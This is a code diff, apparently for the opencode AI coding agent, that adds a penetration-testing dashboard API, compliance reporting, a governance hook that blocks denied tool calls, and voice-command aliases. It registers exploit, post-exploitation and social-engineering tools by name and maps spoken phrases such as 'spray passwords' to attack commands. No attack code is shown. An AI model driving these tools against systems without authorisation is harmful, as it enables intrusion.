+import { Findings } from "../pentest/findings"
+import { PentestTypes } from "../pentest/types"
+import { MonitorStorage } from "../pentest/monitoring/storage"
+import { Scheduler } from "../pentest/monitoring/scheduler"
+import { ComplianceMapper } from "../pentest/compliance/mapper"
+import { ComplianceScorer } from "../pentest/compliance/scorer"
+import { ComplianceFrameworks } from "../pentest/compliance/frameworks"
+import type { ComplianceTypes } from "../pentest/compliance/types"
+import { Storage } from "../storage/storage"
+import { Log } from "../util/log"
+
+const log = Log.create({ service: "dashboard" })
+
+/**
+ * Create the dashboard API router.
+ */
+export function createDashboardRoutes(): Hono {
+  const app = new Hono()
+
+  // ============================================================================
+  // FINDINGS ENDPOINTS
+  // ============================================================================
+
+  /**
+   * GET /pentest/findings - List findings with filters
+   */
+  app.get("/pentest/findings", async (c) => {
+    const query = c.req.query()
+
+    const filters: {
+      sessionID?: string
+      scanID?: string
+      severity?: PentestTypes.Severity
+      status?: PentestTypes.FindingStatus
+      target?: string
+      limit?: number
+    } = {}
+
+    if (query.sessionID) filters.sessionID = query.sessionID
+    if (query.scanID) filters.scanID = query.scanID
+    if (query.severity && PentestTypes.Severity.safeParse(query.severity).success) {
+      filters.severity = query.severity as PentestTypes.Severity
+    }
+    if (query.status && PentestTypes.FindingStatus.safeParse(query.status).success) {
+      filters.status = query.status as PentestTypes.FindingStatus
+    }
+    if (query.target) filters.target = query.target
+    if (query.limit) filters.limit = parseInt(query.limit, 10)
+
+    const findings = await Findings.list({}, filters)
+    return c.json({ findings, total: findings.length })
+  })
+
+  /**
+   * GET /pentest/findings/:id - Get single finding
+   */
+  app.get("/pentest/findings/:id", async (c) => {
+    const id = c.req.param("id")
+    const finding = await Findings.get(id)
+
+    if (!finding) {
+      return c.json({ error: "Finding not found" }, 404)
+    }
+
+    return c.json({ finding })
+  })
+
+  /**
+   * PATCH /pentest/findings/:id - Update finding status/notes
+   */
+  app.patch("/pentest/findings/:id", async (c) => {
+    const id = c.req.param("id")
+    const body = await c.req.json()
+
+    const UpdateSchema = z.object({
+      status: PentestTypes.FindingStatus.optional(),
+      remediation: z.string().optional(),
+      evidence: z.string().optional(),
+    })
+
+    const parsed = UpdateSchema.safeParse(body)
+    if (!parsed.success) {
+      return c.json({ error: "Invalid update data", details: parsed.error.issues }, 400)
+    }
+
+    const updated = await Findings.update(id, parsed.data)
+    if (!updated) {
+      return c.json({ error: "Finding not found" }, 404)
+    }
+
+    return c.json({ finding: updated })
+  })
+
+  /**
+   * DELETE /pentest/findings/:id - Delete finding
+   */
+  app.delete("/pentest/findings/:id", async (c) => {
+    const id = c.req.param("id")
+    const deleted = await Findings.remove(id)
+
+    if (!deleted) {
+      return c.json({ error: "Finding not found" }, 404)
+    }
+
+    return c.json({ success: true })
+  })
+
+  // ============================================================================
+  // SCANS ENDPOINTS
+  // ============================================================================
+
+  /**
+   * GET /pentest/scans - List scans
+   */
+  app.get("/pentest/scans", async (c) => {
+    const query = c.req.query()
+
+    const filters: {
+      sessionID?: string
+      target?: string
+      scanType?: PentestTypes.ScanType
+      limit?: number
+    } = {}
+
+    if (query.sessionID) filters.sessionID = query.sessionID
+    if (query.target) filters.target = query.target
+    if (query.scanType && PentestTypes.ScanType.safeParse(query.scanType).success) {
+      filters.scanType = query.scanType as PentestTypes.ScanType
+    }
+    if (query.limit) filters.limit = parseInt(query.limit, 10)
+
+    const scans = await Findings.listScans({}, filters)
+    return c.json({ scans, total: scans.length })
+  })
+
+  /**
+   * GET /pentest/scans/:id - Get scan details
+   */
+  app.get("/pentest/scans/:id", async (c) => {
+    const id = c.req.param("id")
+    const scan = await Findings.getScan(id)
+
+    if (!scan) {
+      return c.json({ error: "Scan not found" }, 404)
+    }
+
+    return c.json({ scan })
+  })
+
+  // ============================================================================
+  // STATISTICS ENDPOINTS
+  // ============================================================================
+
+  /**
+   * GET /pentest/stats/overview - Dashboard overview statistics
+   */
+  app.get("/pentest/stats/overview", async (c) => {
+    const findings = await Findings.list({})
+    const scans = await Findings.listScans({})
+    const monitors = await MonitorStorage.listMonitors()
+
+    const now = Date.now()
+    const oneDayAgo = now - 24 * 60 * 60 * 1000
+    const sevenDaysAgo = now - 7 * 24 * 60 * 60 * 1000
+
+    // Calculate findings stats
+    const bySeverity: Record<string, number> = {
+      critical: 0,
+      high: 0,
+      medium: 0,
+      low: 0,
+      info: 0,
+    }
+    const byStatus: Record<string, number> = {
+      open: 0,
+      confirmed: 0,
+      mitigated: 0,
+      false_positive: 0,
+    }
+
+    let mitigatedLast7d = 0
+    const mitigationTimes: number[] = []
+
+    for (const finding of findings) {
+      bySeverity[finding.severity] = (bySeverity[finding.severity] || 0) + 1
+      byStatus[finding.status] = (byStatus[finding.status] || 0) + 1
+
+      if (finding.status === "mitigated" && finding.updatedAt && finding.updatedAt >= sevenDaysAgo) {
+        mitigatedLast7d++
+        mitigationTimes.push(finding.updatedAt - finding.createdAt)
+      }
+    }
+
+    const openCriticalHigh = (bySeverity.critical || 0) + (bySeverity.high || 0)
+
+    // Calculate scan stats
+    const scansLast24h = scans.filter((s) => s.startTime >= oneDayAgo).length
+    const activeMonitors = monitors.filter((m) => m.status === "active").length
+
+    // Calculate average mitigation time
+    const avgTimeToMitigate =
+      mitigationTimes.length > 0 ? Math.round(mitigationTimes.reduce((a, b) => a + b, 0) / mitigationTimes.length) : 0
+
+    return c.json({
+      findings: {
+        total: findings.length,
+        bySeverity,
+        byStatus,
+        openCriticalHigh,
+      },
+      scans: {
+        total: scans.length,
+        last24h: scansLast24h,
+        activeMonitors,
+      },
+      remediation: {
+        mitigatedLast7d,
+        avgTimeToMitigate,
+      },
+    })
+  })
+
+  /**
+   * GET /pentest/stats/severity - Severity distribution
+   */
+  app.get("/pentest/stats/severity", async (c) => {
+    const findings = await Findings.list({})
+
+    const distribution: Record<string, number> = {
+      critical: 0,
+      high: 0,
+      medium: 0,
+      low: 0,
+      info: 0,
+    }
+
+    for (const finding of findings) {
+      distribution[finding.severity] = (distribution[finding.severity] || 0) + 1
+    }
+
+    return c.json({ distribution })
+  })
+
+  /**
+   * GET /pentest/stats/trends - Finding trends over time
+   */
+  app.get("/pentest/stats/trends", async (c) => {
+    const query = c.req.query()
+    const days = parseInt(query.days || "30", 10)
+
+    const findings = await Findings.list({})
+    const now = Date.now()
+    const startTime = now - days * 24 * 60 * 60 * 1000
+
+    // Group findings by day
+    const dailyData: Record<string, { created: number; mitigated: number }> = {}
+
+    for (let i = 0; i < days; i++) {
+      const date = new Date(now - i * 24 * 60 * 60 * 1000)
+      const dateKey = date.toISOString().split("T")[0]
+      dailyData[dateKey] = { created: 0, mitigated: 0 }
+    }
+
+    for (const finding of findings) {
+      if (finding.createdAt >= startTime) {
+        const dateKey = new Date(finding.createdAt).toISOString().split("T")[0]
+        if (dailyData[dateKey]) {
+          dailyData[dateKey].created++
+        }
+      }
+
+      if (finding.status === "mitigated" && finding.updatedAt && finding.updatedAt >= startTime) {
+        const dateKey = new Date(finding.updatedAt).toISOString().split("T")[0]
+        if (dailyData[dateKey]) {
+          dailyData[dateKey].mitigated++
+        }
+      }
+    }
+
+    // Convert to sorted array
+    const trends = Object.entries(dailyData)
+      .map(([date, data]) => ({ date, ...data }))
+      .sort((a, b) => a.date.localeCompare(b.date))
+
+    return c.json({ trends, days })
+  })
+
+  // ============================================================================
+  // MONITORS ENDPOINTS
+  // ============================================================================
+
+  /**
+   * GET /pentest/monitors - List monitors
+   */
+  app.get("/pentest/monitors", async (c) => {
+    const query = c.req.query()
+
+    const filters: { sessionID?: string; status?: "active" | "paused" | "disabled" | "error" } = {}
+    if (query.sessionID) filters.sessionID = query.sessionID
+    if (query.status) filters.status = query.status as any
+
+    const monitors = await MonitorStorage.listMonitors(filters)
+    return c.json({ monitors, total: monitors.length })
+  })
+
+  /**
+   * GET /pentest/monitors/:id - Get monitor details
+   */
+  app.get("/pentest/monitors/:id", async (c) => {
+    const id = c.req.param("id")
+    const monitor = await MonitorStorage.getMonitor(id)
+
+    if (!monitor) {
+      return c.json({ error: "Monitor not found" }, 404)
+    }
+
+    return c.json({ monitor })
+  })
+
+  /**
+   * POST /pentest/monitors/:id/run - Trigger immediate run
+   */
+  app.post("/pentest/monitors/:id/run", async (c) => {
+    const id = c.req.param("id")
+    const monitor = await MonitorStorage.getMonitor(id)
+
+    if (!monitor) {
+      return c.json({ error: "Monitor not found" }, 404)
+    }
+
+    try {
+      const run = await Scheduler.triggerNow(id)
+      return c.json({ success: true, runId: run.id })
+    } catch (err) {
+      log.error("Failed to trigger monitor run", { monitorId: id, error: String(err) })
+      return c.json({ error: "Failed to trigger run" }, 500)
+    }
+  })
+
+  /**
+   * GET /pentest/monitors/:id/runs - Run history
+   */
+  app.get("/pentest/monitors/:id/runs", async (c) => {
+    const id = c.req.param("id")
+    const query = c.req.query()
+
+    const limit = query.limit ? parseInt(query.limit, 10) : undefined
+
+    const runs = await MonitorStorage.listRuns(id, { limit })
+    return c.json({ runs, total: runs.length })
+  })
+
+  // ============================================================================
+  // REPORTS ENDPOINTS
+  // ============================================================================
+
+  /**
+   * POST /pentest/reports - Generate report
+   */
+  app.post("/pentest/reports", async (c) => {
+    const body = await c.req.json()
+
+    const ReportRequest = z.object({
+      type: z.enum(["executive", "technical", "compliance"]),
+      filters: z
+        .object({
+          sessionID: z.string().optional(),
+          severity: z.array(PentestTypes.Severity).optional(),
+          status: z.array(PentestTypes.FindingStatus).optional(),
+          dateRange: z
+            .object({
+              start: z.number(),
+              end: z.number(),
+            })
+            .optional(),
+        })
+        .optional(),
+      framework: z.enum(["pci-dss", "hipaa", "soc2"]).optional(),
+    })
+
+    const parsed = ReportRequest.safeParse(body)
+    if (!parsed.success) {
+      return c.json({ error: "Invalid report request", details: parsed.error.issues }, 400)
+    }
+
+    const { type, filters, framework } = parsed.data
+
+    // Get findings based on filters
+    let findings = await Findings.list({})
+
+    if (filters) {
+      if (filters.sessionID) {
+        findings = findings.filter((f) => f.sessionID === filters.sessionID)
+      }
+      if (filters.severity && filters.severity.length > 0) {
+        findings = findings.filter((f) => filters.severity!.includes(f.severity))
+      }
+      if (filters.status && filters.status.length > 0) {
+        findings = findings.filter((f) => filters.status!.includes(f.status))
+      }
+      if (filters.dateRange) {
+        findings = findings.filter(
+          (f) => f.createdAt >= filters.dateRange!.start && f.createdAt <= filters.dateRange!.end
+        )
+      }
+    }
+
+    const reportId = `report_${Date.now().toString(36)}_${Math.random().toString(36).slice(2, 8)}`
+
+    // Generate report content based on type
+    let report: any
+
+    if (type === "executive") {
+      report = generateExecutiveReport(findings, reportId)
+    } else if (type === "technical") {
+      report = generateTechnicalReport(findings, reportId)
+    } else if (type === "compliance" && framework) {
+      const assessment = await ComplianceScorer.assess(framework, findings)
+      report = generateComplianceReport(assessment, findings, reportId)
+    } else {
+      return c.json({ error: "Invalid report type or missing framework" }, 400)
+    }
+
+    // Store report
+    await Storage.write(["pentest", "reports", reportId], report)
+
+    return c.json({ report })
+  })
+
+  /**
+   * GET /pentest/reports/:id - Get report content
+   */
+  app.get("/pentest/reports/:id", async (c) => {
+    const id = c.req.param("id")
+
+    try {
+      const report = await Storage.read(["pentest", "reports", id])
+      return c.json({ report })
+    } catch {
+      return c.json({ error: "Report not found" }, 404)
+    }
+  })
+
+  // ============================================================================
+  // COMPLIANCE ENDPOINTS
+  // ============================================================================
+
+  /**
+   * GET /pentest/compliance/frameworks - List frameworks
+   */
+  app.get("/pentest/compliance/frameworks", async (c) => {
+    const frameworks = ComplianceFrameworks.list()
+    return c.json({ frameworks })
+  })
+
+  /**
+   * GET /pentest/compliance/:framework - Get framework controls
+   */
+  app.get("/pentest/compliance/:framework", async (c) => {
+    const framework = c.req.param("framework") as "pci-dss" | "hipaa" | "soc2"
+
+    try {
+      const controls = ComplianceFrameworks.getControls(framework)
+      const categories = ComplianceFrameworks.getCategories(framework)
+
+      return c.json({ framework, controls, categories })
+    } catch {
+      return c.json({ error: "Framework not found" }, 404)
+    }
+  })
+
+  /**
+   * GET /pentest/compliance/:framework/map - Finding-to-control mapping
+   */
+  app.get("/pentest/compliance/:framework/map", async (c) => {
+    const framework = c.req.param("framework") as "pci-dss" | "hipaa" | "soc2"
+
+    try {
+      const findings = await Findings.list({})
+      const mapping = ComplianceMapper.mapFindings(framework, findings)
+
+      return c.json({ framework, mapping })
+    } catch {
+      return c.json({ error: "Framework not found" }, 404)
+    }
+  })
+
+  /**
+   * POST /pentest/compliance/:framework/assess - Run assessment
+   */
+  app.post("/pentest/compliance/:framework/assess", async (c) => {
+    const framework = c.req.param("framework") as "pci-dss" | "hipaa" | "soc2"
+
+    try {
+      const findings = await Findings.list({})
+      const assessment = await ComplianceScorer.assess(framework, findings)
+
+      return c.json({ assessment })
+    } catch {
+      return c.json({ error: "Framework not found" }, 404)
+    }
+  })
+
+  return app
+}
+
+// ============================================================================
+// REPORT GENERATORS
+// ============================================================================
+
+function generateExecutiveReport(findings: PentestTypes.Finding[], reportId: string) {
+  const bySeverity: Record<string, number> = { critical: 0, high: 0, medium: 0, low: 0, info: 0 }
+  const byStatus: Record<string, number> = { open: 0, confirmed: 0, mitigated: 0, false_positive: 0 }
+
+  for (const f of findings) {
+    bySeverity[f.severity]++
+    byStatus[f.status]++
+  }
+
+  const riskScore = calculateRiskScore(bySeverity)
+
+  return {
+    id: reportId,
+    type: "executive",
+    generatedAt: Date.now(),
+    summary: {
+      totalFindings: findings.length,
+      riskScore,
+      riskLevel: riskScore >= 80 ? "critical" : riskScore >= 60 ? "high" : riskScore >= 40 ? "medium" : "low",
+      bySeverity,
+      byStatus,
+      openIssues: byStatus.open + byStatus.confirmed,
+      resolvedIssues: byStatus.mitigated + byStatus.false_positive,
+    },
+    highlights: {
+      criticalFindings: findings
+        .filter((f) => f.severity === "critical" && f.status !== "mitigated")
+        .map((f) => ({ id: f.id, title: f.title, target: f.target })),
+      topTargets: getTopTargets(findings),
+    },
+    recommendations: generateRecommendations(findings),
+  }
+}
+
+function generateTechnicalReport(findings: PentestTypes.Finding[], reportId: string) {
+  const groupedByTarget = new Map<string, PentestTypes.Finding[]>()
+
+  for (const f of findings) {
+    const existing = groupedByTarget.get(f.target) || []
+    existing.push(f)
+    groupedByTarget.set(f.target, existing)
+  }
+
+  const targets = Array.from(groupedByTarget.entries()).map(([target, targetFindings]) => ({
+    target,
+    findings: targetFindings.map((f) => ({
+      id: f.id,
+      title: f.title,
+      severity: f.severity,
+      status: f.status,
+      port: f.port,
+      service: f.service,
+      description: f.description,
+      evidence: f.evidence,
+      remediation: f.remediation,
+      references: f.references,
+      cve: f.cve,
+    })),
+    summary: {
+      total: targetFindings.length,
+      critical: targetFindings.filter((f) => f.severity === "critical").length,
+      high: targetFindings.filter((f) => f.severity === "high").length,
+      medium: targetFindings.filter((f) => f.severity === "medium").length,
+      low: targetFindings.filter((f) => f.severity === "low").length,
+      info: targetFindings.filter((f) => f.severity === "info").length,
+    },
+  }))
+
+  return {
+    id: reportId,
+    type: "technical",
+    generatedAt: Date.now(),
+    totalFindings: findings.length,
+    targets,
+    allFindings: findings,
+  }
+}
+
+function generateComplianceReport(
+  assessment: ComplianceTypes.ComplianceAssessment,
+  findings: PentestTypes.Finding[],
+  reportId: string
+) {
+  const failedControls = assessment.controls.filter((c) => c.status === "fail" || c.status === "partial")
+
+  return {
+    id: reportId,
+    type: "compliance",
+    framework: assessment.framework,
+    generatedAt: Date.now(),
+    assessment,
+    summary: {
+      compliancePercentage: assessment.score.percentage,
+      totalControls: assessment.score.total,
+      passedControls: assessment.score.passed,
+      failedControls: assessment.score.failed,
+      notAssessed: assessment.score.total - assessment.score.passed - assessment.score.failed,
+    },
+    gaps: failedControls.map((c) => ({
+      control: c.control,
+      status: c.status,
+      relatedFindings: c.findings.map((fid) => findings.find((f) => f.id === fid)).filter(Boolean),
+    })),
+    recommendations: failedControls.map((c) => ({
+      controlId: c.control.id,
+      controlName: c.control.name,
+      priority: c.status === "fail" ? "high" : "medium",
+      action: c.control.remediation || `Address findings related to ${c.control.name}`,
+    })),
+  }
+}
+
+function calculateRiskScore(bySeverity: Record<string, number>): number {
+  const weights = { critical: 40, high: 25, medium: 10, low: 3, info: 1 }
+  let score = 0
+  let maxScore = 0
+
+  for (const [severity, count] of Object.entries(bySeverity)) {
+    score += count * weights[severity as keyof typeof weights]
+    maxScore += count * weights.critical
+  }
+
+  if (maxScore === 0) return 0
+  return Math.round((score / maxScore) * 100)
+}
+
+function getTopTargets(findings: PentestTypes.Finding[]): Array<{ target: string; count: number }> {
+  const targetCounts = new Map<string, number>()
+
+  for (const f of findings) {
+    targetCounts.set(f.target, (targetCounts.get(f.target) || 0) + 1)
+  }
+
+  return Array.from(targetCounts.entries())
+    .map(([target, count]) => ({ target, count }))
+    .sort((a, b) => b.count - a.count)
+    .slice(0, 5)
+}
+
+function generateRecommendations(findings: PentestTypes.Finding[]): string[] {
+  const recommendations: string[] = []
+  const hasCritical = findings.some((f) => f.severity === "critical" && f.status !== "mitigated")
+  const hasHigh = findings.some((f) => f.severity === "high" && f.status !== "mitigated")
+  const hasTelnet = findings.some((f) => f.service === "telnet")
+  const hasFtp = findings.some((f) => f.service === "ftp")
+  const hasExposedDb = findings.some((f) => ["mysql", "ms-sql-s", "postgresql"].includes(f.service || ""))
+
+  if (hasCritical) {
+    recommendations.push("Immediately address all critical severity findings as they pose significant risk.")
+  }
+  if (hasHigh) {
+    recommendations.push("Prioritize remediation of high severity findings within the next 7-14 days.")
+  }
+  if (hasTelnet) {
+    recommendations.push("Replace all Telnet services with SSH for secure remote access.")
+  }
+  if (hasFtp) {
+    recommendations.push("Migrate from FTP to SFTP or FTPS to protect credentials in transit.")
+  }
+  if (hasExposedDb) {
+    recommendations.push("Restrict database access to trusted networks and implement proper authentication.")
+  }
+
+  if (recommendations.length === 0) {
+    recommendations.push("Continue regular security assessments to maintain security posture.")
+  }
+
+  return recommendations
+}
diff --git a/packages/opencode/src/server/server.ts b/packages/opencode/src/server/server.ts
index 7015c818822..a448c0d78d0 100644
--- a/packages/opencode/src/server/server.ts
+++ b/packages/opencode/src/server/server.ts
@@ -55,6 +55,7 @@ import { QuestionRoute } from "./question"
 import { Installation } from "@/installation"
 import { MDNS } from "./mdns"
 import { Worktree } from "../worktree"
+import { createDashboardRoutes } from "./dashboard"
 
 // @ts-ignore This global is needed to prevent ai-sdk from logging warnings to stdout https://github.com/vercel/ai/blob/2dc67e0ef538307f21368db32d5a12345d98831b/packages/ai/src/logger/log-warnings.ts#L85
 globalThis.AI_SDK_LOG_WARNINGS = false
@@ -1709,6 +1710,7 @@ export namespace Server {
           },
         )
         .route("/question", QuestionRoute)
+        .route("/", createDashboardRoutes())
         .get(
           "/command",
           describeRoute({
diff --git a/packages/opencode/src/session/prompt.ts b/packages/opencode/src/session/prompt.ts
index 345b1c49e65..7c88fd9f9d9 100644
--- a/packages/opencode/src/session/prompt.ts
+++ b/packages/opencode/src/session/prompt.ts
@@ -16,6 +16,7 @@ import { Bus } from "../bus"
 import { ProviderTransform } from "../provider/transform"
 import { SystemPrompt } from "./system"
 import { Plugin } from "../plugin"
+import { Governance } from "../governance"
 import PROMPT_PLAN from "../session/prompt/plan.txt"
 import BUILD_SWITCH from "../session/prompt/build-switch.txt"
 import MAX_STEPS from "../session/prompt/max-steps.txt"
@@ -692,17 +693,28 @@ export namespace SessionPrompt {
         inputSchema: jsonSchema(schema as any),
         async execute(args, options) {
           const ctx = context(args, options)
-          await Plugin.trigger(
-            "tool.execute.before",
-            {
-              tool: item.id,
-              sessionID: ctx.sessionID,
-              callID: ctx.callID,
-            },
-            {
-              args,
-            },
-          )
+          try {
+            await Plugin.trigger(
+              "tool.execute.before",
+              {
+                tool: item.id,
+                sessionID: ctx.sessionID,
+                callID: ctx.callID,
+                args,
+              },
+              {
+                args,
+              },
+            )
+          } catch (err) {
+            if (err instanceof Governance.DeniedError) {
+              return {
+                output: `[GOVERNANCE DENIED] Tool "${item.id}" was blocked by governance policy.\nReason: ${err.result.reason || "No reason provided"}\nPolicy: ${err.result.matchedPolicy || "scope violation"}`,
+                metadata: { governance: { denied: true, ...err.result } },
+              }
+            }
+            throw err
+          }
           const result = await item.execute(args, ctx)
           await Plugin.trigger(
             "tool.execute.after",
@@ -732,17 +744,32 @@ export namespace SessionPrompt {
       item.execute = async (args, opts) => {
         const ctx = context(args, opts)
 
-        await Plugin.trigger(
-          "tool.execute.before",
-          {
-            tool: key,
-            sessionID: ctx.sessionID,
-            callID: opts.toolCallId,
-          },
-          {
-            args,
-          },
-        )
+        try {
+          await Plugin.trigger(
+            "tool.execute.before",
+            {
+              tool: key,
+              sessionID: ctx.sessionID,
+              callID: opts.toolCallId,
+              args,
+            },
+            {
+              args,
+            },
+          )
+        } catch (err) {
+          if (err instanceof Governance.DeniedError) {
+            return {
+              content: [
+                {
+                  type: "text" as const,
+                  text: `[GOVERNANCE DENIED] Tool "${key}" was blocked by governance policy.\nReason: ${err.result.reason || "No reason provided"}\nPolicy: ${err.result.matchedPolicy || "scope violation"}`,
+                },
+              ],
+            }
+          }
+          throw err
+        }
 
         await ctx.ask({
           permission: key,
diff --git a/packages/opencode/src/tool/registry.ts b/packages/opencode/src/tool/registry.ts
index 35e378f080b..877483f3291 100644
--- a/packages/opencode/src/tool/registry.ts
+++ b/packages/opencode/src/tool/registry.ts
@@ -11,6 +11,21 @@ import { WebFetchTool } from "./webfetch"
 import { WriteTool } from "./write"
 import { InvalidTool } from "./invalid"
 import { SkillTool } from "./skill"
+import { NmapTool } from "../pentest/nmap-tool"
+import { SecToolsTool } from "../pentest/sectools"
+import { ReportTool } from "../pentest/report-tool"
+import { MonitorTool } from "../pentest/monitoring/tool"
+import { ExploitTool } from "../pentest/exploits/tool"
+import { WebScanTool } from "../pentest/webscan/tool"
+import { ApiScanTool } from "../pentest/apiscan/tool"
+import { NetScanTool } from "../pentest/netscan/tool"
+import { CloudScanTool } from "../pentest/cloudscan/tool"
+import { CVETool } from "../pentest/cve/tool"
+import { ContainerScanTool } from "../pentest/containerscan/tool"
+import { MobileScanTool } from "../pentest/mobilescan/tool"
+import { WirelessScanTool } from "../pentest/wirelessscan/tool"
+import { SocEngTool } from "../pentest/soceng/tool"
+import { PostExploitTool } from "../pentest/postexploit/tool"
 import type { Agent } from "../agent/agent"
 import { Tool } from "./tool"
 import { Instance } from "../project/instance"
@@ -108,6 +123,21 @@ export namespace ToolRegistry {
       WebSearchTool,
       CodeSearchTool,
       SkillTool,
+      NmapTool,
+      SecToolsTool,
+      ReportTool,
+      MonitorTool,
+      ExploitTool,
+      WebScanTool,
+      ApiScanTool,
+      NetScanTool,
+      CloudScanTool,
+      CVETool,
+      ContainerScanTool,
+      MobileScanTool,
+      WirelessScanTool,
+      SocEngTool,
+      PostExploitTool,
       ...(Flag.OPENCODE_EXPERIMENTAL_LSP_TOOL ? [LspTool] : []),
       ...(config.experimental?.batch_tool === true ? [BatchTool] : []),
       ...(Flag.OPENCODE_EXPERIMENTAL_PLAN_MODE && Flag.OPENCODE_CLIENT === "cli" ? [PlanExitTool, PlanEnterTool] : []),
diff --git a/packages/opencode/src/voice/commands.ts b/packages/opencode/src/voice/commands.ts
new file mode 100644
index 00000000000..d2cfa1a3213
--- /dev/null
+++ b/packages/opencode/src/voice/commands.ts
@@ -0,0 +1,330 @@
+/**
+ * @fileoverview Voice Command Parser
+ *
+ * Parses transcribed text into executable commands.
+ */
+
+import { VoiceTypes } from "./types"
+import { Log } from "../util/log"
+
+const log = Log.create({ name: "voice-commands" })
+
+export namespace VoiceCommands {
+  /** Default command aliases for voice shortcuts */
+  const DEFAULT_ALIASES: VoiceTypes.CommandAlias[] = [
+    // Scanning commands
+    {
+      phrases: ["scan network", "network scan", "scan the network"],
+      command: "netscan scan",
+      description: "Run network scan",
+    },
+    {
+      phrases: ["scan ports", "port scan", "scan for ports"],
+      command: "netscan ports",
+      description: "Run port scan",
+    },
+    {
+      phrases: ["scan api", "api scan", "scan the api"],
+      command: "apiscan scan",
+      description: "Run API scan",
+    },
+    {
+      phrases: ["scan web", "web scan", "scan website"],
+      command: "webscan scan",
+      description: "Run web scan",
+    },
+    {
+      phrases: ["scan container", "container scan", "scan containers"],
+      command: "containerscan scan",
+      description: "Run container scan",
+    },
+    {
+      phrases: ["scan mobile", "mobile scan", "scan app"],
+      command: "mobilescan scan",
+      description: "Run mobile scan",
+    },
+    {
+      phrases: ["scan cloud", "cloud scan", "scan cloud resources"],
+      command: "cloudscan scan",
+      description: "Run cloud scan",
+    },
+    {
+      phrases: ["scan cicd", "ci cd scan", "pipeline scan"],
+      command: "cicd scan",
+      description: "Run CI/CD scan",
+    },
+
+    // Discovery commands
+    {
+      phrases: ["discover services", "find services", "service discovery"],
+      command: "netscan discover",
+      description: "Discover network services",
+    },
+    {
+      phrases: ["discover hosts", "find hosts", "host discovery"],
+      command: "netscan hosts",
+      description: "Discover hosts",
+    },
+
+    // Credential commands
+    {
+      phrases: ["test credentials", "credential test", "test passwords"],
+      command: "credscan test",
+      description: "Test credentials",
+    },
+    {
+      phrases: ["spray passwords", "password spray"],
+      command: "credscan spray",
+      description: "Password spray attack",
+    },
+
+    // Active Directory
+    {
+      phrases: ["scan active directory", "ad scan", "scan a d"],
+      command: "adscan scan",
+      description: "Scan Active Directory",
+    },
+    {
+      phrases: ["enumerate domain", "domain enumeration"],
+      command: "adscan enumerate",
+      description: "Enumerate AD domain",
+    },
+
+    // Report commands
+    {
+      phrases: ["generate report", "create report", "make report"],
+      command: "report generate",
+      description: "Generate security report",
+    },
+    {
+      phrases: ["show findings", "list findings", "display findings"],
+      command: "report findings",
+      description: "Show scan findings",
+    },
+
+    // Control commands
+    {
+      phrases: ["stop scan", "stop scanning", "cancel scan"],
+      command: "scan stop",
+      description: "Stop current scan",
+    },
+    {
+      phrases: ["show status", "scan status", "check status"],
+      command: "status",
+      description: "Show scan status",
+    },
+    {
+      phrases: ["show help", "help me", "what can you do"],
+      command: "help",
+      description: "Show help",
+    },
+    {
+      phrases: ["clear screen", "clear console", "clear"],
+      command: "clear",
+      description: "Clear screen",
+    },
+    {
+      phrases: ["exit", "quit", "goodbye", "bye"],
+      command: "exit",
+      description: "Exit application",
+    },
+  ]
+
+  let customAliases: VoiceTypes.CommandAlias[] = []
+
+  /**
+   * Parse transcribed text into a command
+   */
+  export function parse(
+    text: string,
+    aliases: VoiceTypes.CommandAlias[] = []
+  ): VoiceTypes.VoiceCommand | null {
+    const normalizedText = text.toLowerCase().trim()
+    const allAliases = [...DEFAULT_ALIASES, ...customAliases, ...aliases]
+
+    log.debug("Parsing voice command", { text: normalizedText })
+
+    // Try exact phrase match first
+    for (const alias of allAliases) {
+      for (const phrase of alias.phrases) {
+        if (normalizedText === phrase.toLowerCase()) {
+          return {
+            raw: text,
+            command: alias.command,
+            args: {},
+            confidence: 1.0,
+            timestamp: Date.now(),
+          }
+        }
+      }
+    }
+
+    // Try fuzzy match
+    for (const alias of allAliases) {
+      for (const phrase of alias.phrases) {
+        const similarity = calculateSimilarity(normalizedText, phrase.toLowerCase())
+        if (similarity > 0.8) {
+          return {
+            raw: text,
+            command: alias.command,
+            args: {},
+            confidence: similarity,
+            timestamp: Date.now(),
+          }
+        }
+      }
+    }
+
+    // Try to extract command and target from natural language
+    const extracted = extractCommandFromNaturalLanguage(normalizedText)
+    if (extracted) {
+      return extracted
+    }
+
+    // Return raw text as command if no alias matched
+    return {
+      raw: text,
+      command: normalizedText,
+      args: {},
+      confidence: 0.5,
+      timestamp: Date.now(),
+    }
+  }
+
+  /**
+   * Extract command from natural language
+   */
+  function extractCommandFromNaturalLanguage(text: string): VoiceTypes.VoiceCommand | null {
+    // Pattern: "scan [target] for [type]"
+    const scanMatch = text.match(/scan\s+(.+?)\s+(?:for|with)\s+(.+)/i)
+    if (scanMatch) {
+      const target = scanMatch[1]
+      const type = scanMatch[2]
+      return {
+        raw: text,
+        command: `scan --target "${target}" --type "${type}"`,
+        args: { target, type },
+        confidence: 0.7,
+        timestamp: Date.now(),
+      }
+    }
+
+    // Pattern: "scan [target]"
+    const simpleMatch = text.match(/scan\s+(.+)/i)
+    if (simpleMatch) {
+      const target = simpleMatch[1]
+      return {
+        raw: text,
+        command: `scan --target "${target}"`,
+        args: { target },
+        confidence: 0.6,
+        timestamp: Date.now(),
+      }
+    }
+
+    // Pattern: "check [target] for [vulnerability]"
+    const checkMatch = text.match(/check\s+(.+?)\s+for\s+(.+)/i)
+    if (checkMatch) {
+      const target = checkMatch[1]
+      const vulnerability = checkMatch[2]
+      return {
+        raw: text,
+        command: `check --target "${target}" --vuln "${vulnerability}"`,
+        args: { target, vulnerability },
+        confidence: 0.7,
+        timestamp: Date.now(),
+      }
+    }
+
+    return null
+  }
+
+  /**
+   * Calculate similarity between two strings (Levenshtein-based)
+   */
+  function calculateSimilarity(a: string, b: string): number {
+    if (a === b) return 1
+    if (a.length === 0 || b.length === 0) return 0
+
+    const matrix: number[][] = []
+
+    for (let i = 0; i <= b.length; i++) {
+      matrix[i] = [i]
+    }
+
+    for (let j = 0; j <= a.length; j++) {
+      matrix[0][j] = j
+    }
+
+    for (let i = 1; i <= b.length; i++) {
+      for (let j = 1; j <= a.length; j++) {
+        if (b.charAt(i - 1) === a.charAt(j - 1)) {
+          matrix[i][j] = matrix[i - 1][j - 1]
+        } else {
+          matrix[i][j] = Math.min(
+            matrix[i - 1][j - 1] + 1,
+            matrix[i][j - 1] + 1,
+            matrix[i - 1][j] + 1
+          )
+        }
+      }
+    }
+
+    const maxLen = Math.max(a.length, b.length)
+    return 1 - matrix[b.length][a.length] / maxLen
+  }
+
+  /**
+   * Add custom command aliases
+   */
+  export function addAlias(alias: VoiceTypes.CommandAlias): void {
